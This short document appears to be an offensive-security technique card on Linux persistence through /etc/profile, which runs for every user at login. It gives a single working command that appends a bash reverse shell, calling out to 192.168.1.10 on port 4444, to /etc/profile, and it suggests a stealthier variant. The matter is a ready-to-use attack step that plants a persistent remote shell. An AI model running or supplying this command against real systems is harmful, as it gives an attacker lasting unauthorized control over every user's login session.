Persistence in profiles (Linux)
Description
The /etc/profile script is executed for all users during login. By appending a payload to this file, the attacker ensures that their code runs whenever any user logs in via a shell. This method offers broad coverage and is useful for maintaining access across multiple user accounts.
Steps
- For example, a reverse shell, but a more stealthy alternative is recommended
echo 'bash -i >& /dev/tcp/192.168.1.10/4444 0>&1' >> /etc/profile
Reference: Created by Luis Rivera